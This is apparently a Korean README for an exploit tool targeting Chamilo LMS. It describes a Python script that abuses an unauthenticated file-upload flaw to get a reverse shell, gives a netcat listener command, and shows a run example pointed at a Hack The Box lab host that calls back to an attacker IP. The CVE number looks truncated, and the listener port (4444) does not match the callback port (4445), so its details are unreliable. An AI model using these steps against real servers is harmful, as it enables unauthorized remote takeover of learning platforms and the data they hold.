
Chamilo LMS용 원격 코드 실행
pip install requests
이 Python 스크립트는 취약점 CVE-2023-422을 이용하여 서버에 파일을 업로드하고, 그 파일을 사용하여 netcat 리스너로 리버스 셸을 보냅니다. 이 모든 과정은 인증 없이 수행할 수 있습니다. 그러나 Python 스크립트를 성공적으로 사용하려면 다음 단계를 따라야 합니다.
netcat 리스너 시작:
nc -lnvp 4444
Python 스크립트 실행 (예시):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
다음 익스플로잇이 유용했다면 스타(star)를 남겨주세요 :)